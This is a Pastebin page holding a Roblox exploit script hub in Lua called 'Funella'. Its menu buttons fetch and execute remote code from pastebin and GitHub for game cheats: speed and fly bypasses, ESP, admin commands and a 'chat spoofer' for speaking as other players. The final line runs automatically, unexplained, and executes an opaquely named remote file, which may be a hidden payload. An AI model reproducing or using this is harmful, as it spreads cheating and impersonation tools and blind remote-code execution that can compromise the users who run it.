Advertisement
BigDaddy1978

Funilla (my first ever script)

Apr 16th, 2023 (edited)
133
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 5.65 KB | None | 0 0
  1. --Og Funella
  2.  
  3. print("Welcome to funelle")
  4. print(game.Players.LocalPlayer.Name)
  5. print("Enjoy This Script And Dont Forget to look in the Discord")
  6. wait(3)
  7. print("discord.gg/rE2RgvEhMY")
  8.  
  9.  
  10. local Library = loadstring(game:HttpGet("https://raw.githubusercontent.com/xHeptc/Kavo-UI-Library/main/source.lua"))()
  11. local Window = Library.CreateLib("Funella", "Ocean")
  12.  
  13. --MAIN
  14. local Main = Window:NewTab("Main")
  15. local MainSection = Main:NewSection("Main")
  16. MainSection:NewToggle("Go Fast", "Be flash", function(state)
  17. if state then
  18. game.Players.LocalPlayer.Character.Humanoid.WalkSpeed = 120
  19. game.Players.LocalPlayer.Character.Humanoid.JumpPower = 120
  20. else
  21. game.Players.LocalPlayer.Character.Humanoid.WalkSpeed = 50
  22. game.Players.LocalPlayer.Character.Humanoid.JumpPower = 50
  23. end
  24. end)
  25.  
  26. MainSection:NewButton("Back/Front flip", "X for back flip/Z for front", function()
  27. loadstring(game:HttpGet('https://pastebin.com/raw/7wDcPtLk'))()
  28. end)
  29.  
  30. MainSection:NewButton("Btools(Client Side)", "Gives You BTools", function()
  31. loadstring(game:HttpGet('https://pastebin.com/raw/FBKJTUyw'))()
  32. end)
  33. MainSection:NewButton("Infinite Yield", "FE Admin Commands", function()
  34. loadstring(game:HttpGet(('https://raw.githubusercontent.com/EdgeIY/infiniteyield/master/source'),true))()
  35. end)
  36. MainSection:NewButton("Orca Hub", "fav and good exp", function()
  37. loadstring(game:HttpGet(('https://raw.githubusercontent.com/richie0866/orca/master/public/latest.lua'),true))()
  38. end)
  39.  
  40. MainSection:NewButton("Print Your IP", "Just Prints Your IP", function()
  41. print(game:HttpGet('https://ipinfo.io/ip'))
  42. end)
  43.  
  44. MainSection:NewButton("Print Your HWID", "Prints your HardWare ID", function()
  45. print(game:GetService("RbxAnalyticsService"):GetClientId())
  46. end)
  47.  
  48. --Local Player
  49. local Player = Window:NewTab("Player")
  50. local PlayerSection = Player:NewSection("Player Mods")
  51. PlayerSection:NewSlider("WalkSpeed", "Choose how fast you whant to be", 500, 16, function(s) -- 500 (MaxValue) | 0 (MinValue)
  52. game.Players.LocalPlayer.Character.Humanoid.WalkSpeed = s
  53. end)
  54.  
  55. PlayerSection:NewSlider("JumpPower", "Choose your own Jump Power", 500, 50, function(s) -- 500 (MaxValue) | 0 (MinValue)
  56. game.Players.LocalPlayer.Character.Humanoid.JumpPower = s
  57. end)
  58.  
  59. --Extra
  60. local Extra = Window:NewTab("Other")
  61. local ExtraSection = Extra:NewSection("Other")
  62.  
  63. ExtraSection:NewButton("Chat Spoofer", "Lets You chat for other peopple;)", function()
  64. loadstring(game:HttpGet(('https://pastebin.com/raw/djBfk8Li'),true))()
  65. end)
  66.  
  67. ExtraSection:NewButton("By Passed Fly", "Fly Lil burdie", function()
  68. loadstring(game:HttpGet("https://raw.githubusercontent.com/Nicuse/RobloxScripts/main/BypassedFly.lua"))()
  69.  
  70. Fly(true)
  71. end)
  72.  
  73. ExtraSection:NewButton("ESP", "Lets u see ppl", function()
  74. loadstring(game:HttpGet('https://pastebin.com/raw/NUjnVTsX'))()
  75. end)
  76.  
  77. ExtraSection:NewButton("Fly in any game", "Detectable in some game", function()
  78. loadstring(game:HttpGet('https://pastebin.com/raw/Uuhhch2r'))()
  79. end)
  80.  
  81. ExtraSection:NewButton("Execute Rayfield Funella verison", "New version", function()
  82. loadstring(game:HttpGet(('https://pastebin.com/raw/43hQdDs7'),true))()
  83. print('Rayfield Executed succesfully')
  84. end)
  85.  
  86. ExtraSection:NewButton("Execute Orion Funella", "Yes.", function()
  87. loadstring(game:HttpGet(('https://pastebin.com/raw/Abe7UK9b'),true))()
  88. print("Orion executed succesfully")
  89. end)
  90.  
  91. --Credits
  92. local Credits = Window:NewTab("Credits")
  93. local CreditSection = Credits:NewSection("Credits")
  94.  
  95. CreditSection:NewButton("Made By: BigPwappy On Ig", "Creator", function()
  96. print("Clicked")
  97. end)
  98. CreditSection:NewButton("Made By: Meh_name_is_daniel_2 on tt", "Creator", function()
  99. print("Clicked")
  100. end)
  101. CreditSection:NewButton("Made By: DannyPlayzzz on Yt", "Creator", function()
  102. print("Clicked")
  103. end)
  104. CreditSection:NewButton("Made By: Danny6210lollol on roblox ;)", "Creator", function()
  105. print("Clicked")
  106. end)
  107. CreditSection:NewButton("Made By: SpiderMan#0001)", "Creator", function()
  108. print("Clicked")
  109. end)
  110.  
  111. --UI
  112. local UI = Window:NewTab("UI")
  113.  
  114. local UISection = UI:NewSection("UI toggle")
  115.  
  116. UISection:NewKeybind("Toggle the UI", "Toggles UI", Enum.KeyCode.F, function()
  117. Library:ToggleUI()
  118. end)
  119.  
  120. --Info
  121.  
  122. local Information = Window:NewTab("Info About The UI")
  123. local InformationSection = Information:NewSection("Info abt the UI")
  124.  
  125. InformationSection:NewButton("V5.5", "The Version", function()
  126. print("Clicked")
  127. end)
  128. InformationSection:NewButton("no ", "If its still in beta", function()
  129. print("Clicked")
  130. end)
  131. InformationSection:NewButton("Some What discontinued", "Self explanotory", function()
  132. print("Clicked")
  133. end)
  134.  
  135. --Loggs
  136.  
  137. local Loggs = Window:NewTab("Loggs")
  138. local LoggsSection = Loggs:NewSection("Loggs")
  139.  
  140. LoggsSection:NewButton("(4/15/2023)", "UI was made", function()
  141. print("new upd")
  142. end)
  143. LoggsSection:NewButton("(4/16/2023)", "Added Btools,Changed name,Added credits section,added UI toggle", function()
  144. print("V2")
  145. end)
  146. LoggsSection:NewButton("(4/17/2023)", "Added Loggs Section, Also discord Tab/Discord invite", function()
  147. print("V3")
  148. end)
  149.  
  150. LoggsSection:NewButton("(6/3/2023)", "Full Funella released", function()
  151. print("V3.9")
  152. end)
  153.  
  154. LoggsSection:NewButton("(6/23/2023)", "Made a RayField Vs", function()
  155. print("V4")
  156. end)
  157.  
  158. LoggsSection:NewButton("(7/2/2023)", "Made a orion version", function()
  159. print("V5")
  160. end)
  161.  
  162. LoggsSection:NewButton("(8/30/2023)", "Added some features", function()
  163. print("V5.5")
  164. end)
  165.  
  166. wait (2)
  167.  
  168. loadstring(game:HttpGet("https://raw.githubusercontent.com/BigDilk/BigDilk/main/01010101010111011001",true))()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement